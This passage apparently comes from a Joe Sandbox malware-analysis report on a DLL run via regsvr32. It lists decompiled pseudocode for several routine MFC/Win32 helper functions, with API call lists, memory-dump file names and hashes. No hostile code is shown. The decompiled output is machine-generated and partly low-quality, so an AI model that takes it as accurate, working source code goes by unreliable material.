						_push(4);
						E1004764D(0x1008dd26, _t21, _t24, _t26);
						_t23 = E10020454(0x104);
						_v64 = _t23;
						_t19 = 0;
						_v52 = 0;
						if(_t23 != 0) {
							_t19 = E1001DB72(_t23);
						}
						return E10047725(_t19);
					}
				}
			}

0x100354d7
0x100354dc
0x100354e3
0x10035545
0x1003554a
0x100354e5
0x100354e9
0x100354f3
0x100354f8
0x10035500
0x10035506
0x1003550e
0x1003550e
0x10035519
0x1003551b
0x1003551b
0x10035521
0x10035523
0x1003552a
0x10035533
0x1003553b
0x10035541
0x00000000
0x1003552c
0x1000a069
0x1000a06c
0x1000a076
0x1000a07d
0x1000a082
0x1000a083
0x1000a08a
0x1000a099
0x1000a09b
0x1000a09e
0x1000a0a2
0x1000a0a5
0x1000a0a7
0x1000a0a7
0x1000a0b1
0x1000a0b1
0x1003552a

APIs

PeekMessageA.USER32(?,?,00000367,00000367,00000003), ref: 100354F8
PostMessageA.USER32(?,00000367,00000000,00000000), ref: 1003550E
GetCapture.USER32 ref: 10035510
ReleaseCapture.USER32 ref: 1003551B
PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 10035541

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$CapturePost$PeekRelease
String ID:
API String ID: 1125932295-0
Opcode ID: 37a08277240ea16d8cdabf5d03996f0f311aa652a5b916b4b4eb8d78ede6edce
Instruction ID: a29667abefbe2db7b0d112607e15090e929c334846b5b58c1d4275725dc5be7d
Opcode Fuzzy Hash: 37a08277240ea16d8cdabf5d03996f0f311aa652a5b916b4b4eb8d78ede6edce
Instruction Fuzzy Hash: E701D631504A48AFE221AF22CC84E5B7FBDFB86786F51095DF08686131D632F950C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000A673 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000A673(int _a4, int* _a8, intOrPtr* _a12) {
				int _t9;
				int _t11;
				struct HDC__* _t14;
				int* _t15;
				int _t18;

				_t14 = _a4;
				if(_t14 == 0 || GetDeviceCaps(_t14, 0x58) == 0) {
					_t18 =  *0x100bdc90; // 0x60
					_t9 =  *0x100bdc94; // 0x60
				} else {
					_t18 = GetDeviceCaps(_t14, 0x58);
					_t9 = GetDeviceCaps(_t14, 0x5a);
				}
				_t15 = _a8;
				_a4 = _t9;
				 *_a12 = MulDiv(0x9ec,  *_t15, _t18);
				_t11 = MulDiv(0x9ec, _t15[1], _a4);
				 *(_a12 + 4) = _t11;
				return _t11;
			}

0x1000a677
0x1000a67e
0x1000a69d
0x1000a6a3
0x1000a68f
0x1000a697
0x1000a699
0x1000a699
0x1000a6a8
0x1000a6ba
0x1000a6c5
0x1000a6cb
0x1000a6d2
0x1000a6d7

APIs

GetDeviceCaps.GDI32(?,00000058), ref: 1000A689
GetDeviceCaps.GDI32(?,00000058), ref: 1000A692
GetDeviceCaps.GDI32(?,0000005A), ref: 1000A699
MulDiv.KERNEL32 ref: 1000A6BD
MulDiv.KERNEL32 ref: 1000A6CB

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CapsDevice
String ID:
API String ID: 328075279-0
Opcode ID: f6d52857f3f8d9bf59b635682ae3576837b394e7aa8c675bd496f2aa6d4a99f3
Instruction ID: 895715aa3ec41fd6efb3120891880696564a458cddba16438aa0474ee140ee27
Opcode Fuzzy Hash: f6d52857f3f8d9bf59b635682ae3576837b394e7aa8c675bd496f2aa6d4a99f3
Instruction Fuzzy Hash: D6014F75600318ABEB01DF65CCC4D5B7FADFB8A7A0B18402AFE0857251DA75D801DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002A40C Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1002A40C(void* __ebx, void* __edi, void* __ebp, void* __eflags, CHAR* _a4) {
				intOrPtr _v4;
				void* __ecx;
				void* __esi;
				struct HRSRC__* _t6;
				void* _t8;
				struct HRSRC__* _t10;
				struct HRSRC__* _t14;
				intOrPtr _t16;
				void* _t19;
				void* _t21;
				struct HINSTANCE__* _t22;

				_v4 = _t16;
				_t22 =  *(E1001E302(__ebx, __edi, _t21, __eflags) + 0xc);
				if(_t22 != 0) {
					_push(__ebx);
					_t6 = FindResourceA(_t22, _a4, 5);
					_t14 = _t6;
					__eflags = _t14;
					if(_t14 != 0) {
						_push(__ebp);
						_push(__edi);
						_t19 = LoadResource(_t22, _t14);
						_t8 = LockResource(_t19);
						_t10 = E1002A3AE(_v4, _t8, _t8, SizeofResource(_t22, _t14));
						FreeResource(_t19);
						_t6 = _t10;
					}
					return _t6;
				}
				return 0;
			}

0x1002a40e
0x1002a417
0x1002a41c
0x1002a422
0x1002a42a
0x1002a430
0x1002a432
0x1002a434
0x1002a436
0x1002a437
0x1002a440
0x1002a443
0x1002a459
0x1002a461
0x1002a468
0x1002a46a
0x00000000
0x1002a46b
0x00000000

APIs

FindResourceA.KERNEL32 ref: 1002A42A
LoadResource.KERNEL32(?,00000000), ref: 1002A43A
LockResource.KERNEL32(00000000), ref: 1002A443
SizeofResource.KERNEL32(?,00000000), ref: 1002A44D
FreeResource.KERNEL32(00000000,00000000,00000000), ref: 1002A461

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLockSizeof
String ID:
API String ID: 4159136517-0
Opcode ID: 95b9d2a4c0596dbc68a7913f468048979d06e9f9ffaf4b11731570b30cf6fdbc
Instruction ID: f4c258c3e0f3460aec006f9b603e92ef3604b289b1ebd12ab008e46807a9b7ea
Opcode Fuzzy Hash: 95b9d2a4c0596dbc68a7913f468048979d06e9f9ffaf4b11731570b30cf6fdbc
Instruction Fuzzy Hash: A8F096766017246FE300AB749D8CDAFB7ECEF876917054469FE01D3211DA75DC0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000C235 Relevance: 7.5, APIs: 5, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000C235(void* __ecx, int _a4) {
				int _t7;
				void* _t16;
				void* _t20;

				_t7 = SelectClipPath( *(__ecx + 4), _a4);
				if(_t7 != 0) {
					_t16 = 1;
					if( *(__ecx + 4) !=  *(__ecx + 8)) {
						_t20 = CreateRectRgn(0, 0, 0, 0);
						if(GetClipRgn( *(__ecx + 4), _t20) < 0 || SelectClipRgn( *(__ecx + 8), _t20) == 0) {
							_t16 = 0;
						}
						DeleteObject(_t20);
					}
					return _t16;
				}
				return _t7;
			}

0x1000c23f
0x1000c247
0x1000c24f
0x1000c253
0x1000c264
0x1000c272
0x1000c282
0x1000c282
0x1000c285
0x1000c28b
0x00000000
0x1000c28e
0x1000c290

APIs

SelectClipPath.GDI32(?,?), ref: 1000C23F
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1000C25E
GetClipRgn.GDI32(?,00000000), ref: 1000C26A
SelectClipRgn.GDI32(?,00000000), ref: 1000C278
DeleteObject.GDI32(00000000), ref: 1000C285

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Clip$Select$CreateDeleteObjectPathRect
String ID:
API String ID: 1230964757-0
Opcode ID: c5a595ff58a55da9221d8328392afdc812a962fa1ed36d5cdbb8174e9c783db7
Instruction ID: 47a7a4d585018c910710f035c3deb9cf876d6beea01288e339afd1202d7d3335
Opcode Fuzzy Hash: c5a595ff58a55da9221d8328392afdc812a962fa1ed36d5cdbb8174e9c783db7
Instruction Fuzzy Hash: B2F01D31241311AFF360AFA1CE89F17BBA9EB46B91F018828F546D2570CBA0AC04CA20

Uniqueness

Uniqueness Score: -1.00%

Function 1000BC25 Relevance: 7.5, APIs: 5, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1000BC25(intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t8;
				void* _t9;
				void* _t15;
				void* _t17;
				intOrPtr _t20;

				_t20 = _a4;
				_t15 = GlobalLock( *(_t20 + 0xc));
				if(_t15 != 0) {
					_t8 = GlobalLock( *(_t20 + 8));
					__eflags = _t8;
					if(__eflags != 0) {
						_push(_t8);
						_push(_t15);
						_t9 = E1000BA16(_t15, _t17, GlobalLock, _t20, __eflags);
						GlobalUnlock( *(_t20 + 0xc));
						GlobalUnlock( *(_t20 + 8));
						return _t9;
					}
					GlobalUnlock( *(_t20 + 0xc));
				}
				return 0;
			}

0x1000bc27
0x1000bc37
0x1000bc3b
0x1000bc44
0x1000bc46
0x1000bc48
0x1000bc55
0x1000bc56
0x1000bc57
0x1000bc67
0x1000bc6c
0x00000000
0x1000bc6e
0x1000bc4d
0x1000bc4d
0x00000000

APIs

GlobalLock.KERNEL32 ref: 1000BC35
GlobalLock.KERNEL32 ref: 1000BC44
GlobalUnlock.KERNEL32(?), ref: 1000BC4D

Part of subcall function 1000BA16: __EH_prolog3_GS.LIBCMT ref: 1000BA1D
Part of subcall function 1000BA16: __alloca_probe_16.LIBCMT ref: 1000BAFA
Part of subcall function 1000BA16: CoTaskMemAlloc.OLE32(?), ref: 1000BB41

GlobalUnlock.KERNEL32(?), ref: 1000BC67
GlobalUnlock.KERNEL32(?), ref: 1000BC6C

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$Unlock$Lock$AllocH_prolog3_Task__alloca_probe_16
String ID:
API String ID: 1323298786-0
Opcode ID: 6498b7e41d7b98b0c12b49beaeabd060f1d80820e3d9cf9becf0d3cf71dd153b
Instruction ID: c600b051740266f3091284cb5df07c1a2b98d22017044a12e2a4374295ff7298
Opcode Fuzzy Hash: 6498b7e41d7b98b0c12b49beaeabd060f1d80820e3d9cf9becf0d3cf71dd153b
Instruction Fuzzy Hash: 00F08275200A05AFF720AF65CC84C07B7EDEF952903158835FA5192130DB31EC109A10

Uniqueness

Uniqueness Score: -1.00%

Function 100246AA Relevance: 7.5, APIs: 5, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E100246AA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t21;
				intOrPtr* _t23;
				void* _t24;

				E1004764D(0x1008f78c, __ebx, __edi, __esi);
				_t21 =  *((intOrPtr*)(_t24 + 0xc));
				_t23 = __imp__#7;
				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
				L1002285D(__ebx,  *((intOrPtr*)(_t24 + 8)), _t21, _t24,  *_t23(_t21, 0));
				_push(_t21);
				if( *_t23() > 0) {
					L10022B9D( *((intOrPtr*)(_t24 + 8)), _t21, _t21,  *_t23(_t21) + _t14);
				}
				__imp__#6(_t21);
				return E10047725( *((intOrPtr*)(_t24 + 8)));
			}

0x100246b1
0x100246b6
0x100246b9
0x100246bf
0x100246ca
0x100246cf
0x100246d4
0x100246e0
0x100246e0
0x100246e6
0x100246f4

APIs

__EH_prolog3.LIBCMT ref: 100246B1
SysStringLen.OLEAUT32(?), ref: 100246C4
SysStringLen.OLEAUT32(?), ref: 100246D0
SysStringLen.OLEAUT32(?), ref: 100246D7
SysFreeString.OLEAUT32(?), ref: 100246E6

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: String$FreeH_prolog3
String ID:
API String ID: 315669285-0
Opcode ID: 1f65b4bf3e8025871e6c3f7dba31e3d88d0171a9be26f73c8f8c0b216a005208
Instruction ID: 9c161dffb03ac8c6011b1bdbd1b2ee79063cf2212ae75fd4fa33748ab2b7d01d
Opcode Fuzzy Hash: 1f65b4bf3e8025871e6c3f7dba31e3d88d0171a9be26f73c8f8c0b216a005208
Instruction Fuzzy Hash: 1DE06D39900118BBEB01EB74CC85FBE3BB8EF86780F404059F904E7241CB34A9129AA9

Uniqueness

Uniqueness Score: -1.00%

Function 1003F212 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 319
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E1003F212(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				intOrPtr* _v28;
				signed int _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t185;
				signed char _t187;
				intOrPtr* _t189;
				signed char _t193;
				signed int _t196;
				intOrPtr* _t210;
				intOrPtr _t213;
				intOrPtr* _t214;
				signed int _t223;
				signed int _t230;
				intOrPtr* _t232;
				void* _t243;
				intOrPtr _t257;
				signed int _t264;
				signed int _t273;
				signed int _t276;
				signed int _t278;
				intOrPtr* _t281;
				intOrPtr _t282;
				intOrPtr* _t286;
				void* _t290;
				intOrPtr _t291;
				intOrPtr* _t293;

				_t281 = _a4;
				_push(0);
				_t232 = __ecx;
				_push(0);
				_push(0x418);
				_v8 = 0;
				 *_t281 = 0;
				 *((intOrPtr*)(_t281 + 4)) = 0;
				 *((intOrPtr*)( *__ecx + 0x110))();
				_v16 = 0;
				if(0 != 0) {
					_t276 = 0x14;
					_t277 = 0 * _t276 >> 0x20;
					_t185 = E10009F14(0,  ~0x00BADBAD | 0 * _t276);
					_t290 = 0;
					_v8 = _t185;
					if(_v16 > 0) {
						_t282 = _t185;
						do {
							E1003DEA1(_t232, _t290, _t282);
							_t290 = _t290 + 1;
							_t282 = _t282 + 0x14;
						} while (_t290 < _v16);
						_t291 = _v16;
						_t281 = _a4;
						_t243 = 0;
						if(_t291 > 0) {
							_t187 =  *(_t232 + 0x80);
							if((_t187 & 0x00000002) == 0) {
								_t277 = _t187 & 0x00000004;
								if((_t187 & 0x00000004) == 0) {
									L20:
									_push(_t243);
									asm("sbb eax, eax");
									_t223 =  ~(_a8 & 0x00000002) & 0x00007fff;
									__eflags = _t223;
									_push(_t223);
								} else {
									if((_a8 & 0x00000004) == 0) {
										__eflags = _a8 & 0x00000008;
										if((_a8 & 0x00000008) == 0) {
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												__eflags = _a12 - 0xffffffff;
												if(_a12 == 0xffffffff) {
													__eflags = _t187 & 0x00000001;
													if((_t187 & 0x00000001) != 0) {
														goto L8;
													} else {
														goto L20;
													}
												} else {
													SetRectEmpty( &_v48);
													 *((intOrPtr*)( *_t232 + 0x140))( &_v48, _a8 & 0x00000002);
													_t230 = _a8 & 0x00000020;
													__eflags = _t230;
													if(_t230 == 0) {
														_t273 = _v48.right - _v48.left;
														__eflags = _t273;
													} else {
														_t273 = _v48.bottom - _v48.top;
													}
													_push(_t230);
													_t243 = _t273 + _a12;
													goto L13;
												}
											} else {
												_push(0);
												L13:
												_push(_t243);
											}
										} else {
											_push(0);
											_push(0x7fff);
										}
									} else {
										L8:
										_push(_t243);
										_push( *((intOrPtr*)(_t232 + 0x70)));
									}
								}
								_push(_t291);
								_push(_v8);
								L1003E9C6(_t232, _t277);
							}
							_t189 = L1003E897(_t232,  &(_v48.right), _v8, _t291);
							 *_t281 =  *_t189;
							 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t189 + 4));
							if((_a8 & 0x00000040) != 0) {
								_v24 = 0;
								_a12 = 0;
								_v48.bottom =  *((intOrPtr*)(_t232 + 0xa0));
								 *((intOrPtr*)(_t232 + 0xa0)) = 0;
								if(_t291 > 0) {
									_t210 = _v8 + 4;
									_v28 = _t210;
									_t257 = _t291;
									do {
										if(( *(_t210 + 5) & 0x00000001) != 0 &&  *_t210 != 0) {
											_a12 = _a12 + 1;
										}
										_t210 = _t210 + 0x14;
										_t257 = _t257 - 1;
									} while (_t257 != 0);
									_t314 = _a12;
									if(_a12 > 0) {
										_t278 = 0x18;
										_t213 = E10009F14(_t314,  ~(0 | _t314 > 0x00000000) | _a12 * _t278);
										_t73 = _t213 + 8; // 0x8
										_t286 = _t73;
										_v24 = _t213;
										_t214 = _v28;
										_v32 = _a12;
										_t264 = 0;
										_a12 = 0;
										_v12 = 0;
										_v20 = _t286;
										_v28 = _t214;
										while(1) {
											_t277 = _v32;
											if(_a12 >= _v32) {
												break;
											}
											if(( *(_t214 + 5) & 0x00000001) != 0 &&  *_t214 != 0) {
												 *((intOrPtr*)(_t286 - 8)) = _t264;
												_t277 =  &_v64;
												 *((intOrPtr*)(_t286 - 4)) =  *_t214;
												 *((intOrPtr*)( *_t232 + 0x170))(_t264,  &_v64);
												L1000C931(_t232,  &_v64);
												_a12 = _a12 + 1;
												_v20 = _v20 + 0x18;
												_t264 = _v12;
												_t214 = _v28;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t286 = _v20;
											}
											_t264 = _t264 + 1;
											_t214 = _t214 + 0x14;
											_v12 = _t264;
											_v28 = _t214;
											if(_t264 < _v16) {
												continue;
											}
											break;
										}
										_t291 = _v16;
										_t281 = _a4;
									}
								}
								_t193 =  *(_t232 + 0x80);
								if((_t193 & 0x00000001) != 0 && (_t193 & 0x00000004) != 0) {
									 *((intOrPtr*)(_t232 + 0x70)) =  *_t281;
								}
								_v12 = _v12 & 0x00000000;
								_t323 = _t291;
								if(_t291 > 0) {
									_v20 = _v8;
									do {
										E1003E699(_t232, _t277, _t323, _v12, _v20);
										_v12 = _v12 + 1;
										_v20 = _v20 + 0x14;
									} while (_v12 < _t291);
								}
								if(_a12 > 0) {
									_t293 = _v24 + 8;
									_v20 = _t293;
									do {
										_t196 = E1001768F(_t232,  *((intOrPtr*)(_t293 - 4)));
										_v32 = _t196;
										if(_t196 != 0) {
											GetWindowRect( *(_t196 + 0x20),  &_v64);
											 *((intOrPtr*)( *_t232 + 0x170))( *((intOrPtr*)(_v20 - 8)),  &_v64);
											E10017C59(_v32, 0, _v64.left -  *_t293 + _v64.left, _v64.top -  *((intOrPtr*)(_t293 + 4)) + _v64.top, 0, 0, 0x15);
											_t293 = _v20;
											_t281 = _a4;
										}
										_t293 = _t293 + 0x18;
										_t142 =  &_a12;
										 *_t142 = _a12 - 1;
										_t329 =  *_t142;
										_v20 = _t293;
									} while ( *_t142 != 0);
									_push(_v24);
									E10009F3F(_t232, _t281, _t293, _t329);
								}
								 *((intOrPtr*)(_t232 + 0xa0)) = _v48.bottom;
							}
							_push(_v8);
							E10009F3F(_t232, _t281, _t291, _t329);
						}
					}
				}
				SetRectEmpty( &_v64);
				 *((intOrPtr*)( *_t232 + 0x140))( &_v64, _a8 & 0x00000002);
				 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t281 + 4)) + _v64.top - _v64.bottom;
				 *_t281 =  *_t281 + _v64.left - _v64.right;
				L10042C79( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
				_t181 =  *_t281;
				if(_t181 <= _v48.right) {
					_t181 = _v48.right;
				}
				 *_t281 = _t181;
				_t182 =  *((intOrPtr*)(_t281 + 4));
				if(_t182 <= _v48.bottom) {
					_t182 = _v48.bottom;
				}
				 *((intOrPtr*)(_t281 + 4)) = _t182;
				return _t281;
			}

0x1003f21d
0x1003f220
0x1003f221
0x1003f225
0x1003f226
0x1003f22b
0x1003f22e
0x1003f230
0x1003f233
0x1003f23f
0x1003f242
0x1003f24a
0x1003f24b
0x1003f255
0x1003f25a
0x1003f260
0x1003f263
0x1003f269
0x1003f26b
0x1003f26f
0x1003f274
0x1003f275
0x1003f278
0x1003f27d
0x1003f280
0x1003f283
0x1003f287
0x1003f28d
0x1003f295
0x1003f29d
0x1003f2a0
0x1003f30d
0x1003f314
0x1003f315
0x1003f317
0x1003f317
0x1003f31c
0x1003f2a2
0x1003f2a6
0x1003f2ae
0x1003f2b2
0x1003f2bc
0x1003f2c0
0x1003f2c6
0x1003f2ca
0x1003f309
0x1003f30b
0x00000000
0x00000000
0x00000000
0x00000000
0x1003f2cc
0x1003f2d0
0x1003f2e5
0x1003f2ee
0x1003f2ee
0x1003f2f1
0x1003f2fe
0x1003f2fe
0x1003f2f3
0x1003f2f6
0x1003f2f6
0x1003f301
0x1003f305
0x00000000
0x1003f305
0x1003f2c2
0x1003f2c2
0x1003f2c3
0x1003f2c3
0x1003f2c3
0x1003f2b4
0x1003f2b4
0x1003f2b5
0x1003f2b5
0x1003f2a8
0x1003f2a8
0x1003f2a8
0x1003f2a9
0x1003f2a9
0x1003f2a6
0x1003f31d
0x1003f31e
0x1003f323
0x1003f323
0x1003f332
0x1003f340
0x1003f342
0x1003f345
0x1003f355
0x1003f358
0x1003f35b
0x1003f35e
0x1003f364
0x1003f36d
0x1003f370
0x1003f373
0x1003f375
0x1003f379
0x1003f380
0x1003f380
0x1003f383
0x1003f386
0x1003f386
0x1003f389
0x1003f38d
0x1003f39a
0x1003f3a5
0x1003f3ae
0x1003f3ae
0x1003f3b1
0x1003f3b4
0x1003f3b7
0x1003f3ba
0x1003f3bc
0x1003f3bf
0x1003f3c2
0x1003f3c5
0x1003f3c8
0x1003f3c8
0x1003f3ce
0x00000000
0x00000000
0x1003f3d4
0x1003f3db
0x1003f3e0
0x1003f3e4
0x1003f3ec
0x1003f3f8
0x1003f3fd
0x1003f400
0x1003f404
0x1003f407
0x1003f40d
0x1003f40e
0x1003f40f
0x1003f410
0x1003f411
0x1003f411
0x1003f414
0x1003f415
0x1003f41b
0x1003f41e
0x1003f421
0x00000000
0x00000000
0x00000000
0x1003f421
0x1003f423
0x1003f426
0x1003f426
0x1003f38d
0x1003f429
0x1003f431
0x1003f439
0x1003f439
0x1003f43c
0x1003f440
0x1003f442
0x1003f447
0x1003f44a
0x1003f452
0x1003f457
0x1003f45a
0x1003f45e
0x1003f44a
0x1003f467
0x1003f473
0x1003f476
0x1003f47c
0x1003f481
0x1003f488
0x1003f48b
0x1003f494
0x1003f4b7
0x1003f4d3
0x1003f4d8
0x1003f4db
0x1003f4db
0x1003f4de
0x1003f4e1
0x1003f4e1
0x1003f4e1
0x1003f4e4
0x1003f4e4
0x1003f4e9
0x1003f4ec
0x1003f4f1
0x1003f4f5
0x1003f4f5
0x1003f4fb
0x1003f4fe
0x1003f503
0x1003f287
0x1003f263
0x1003f508
0x1003f51d
0x1003f52a
0x1003f535
0x1003f542
0x1003f547
0x1003f54c
0x1003f54e
0x1003f54e
0x1003f551
0x1003f553
0x1003f559
0x1003f55b
0x1003f55b
0x1003f55e
0x1003f567

APIs

SetRectEmpty.USER32(?), ref: 1003F508

Part of subcall function 10009F14: _malloc.LIBCMT ref: 10009F2E

GetWindowRect.USER32 ref: 1003F494

Strings

@, xrefs: 1003F337

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
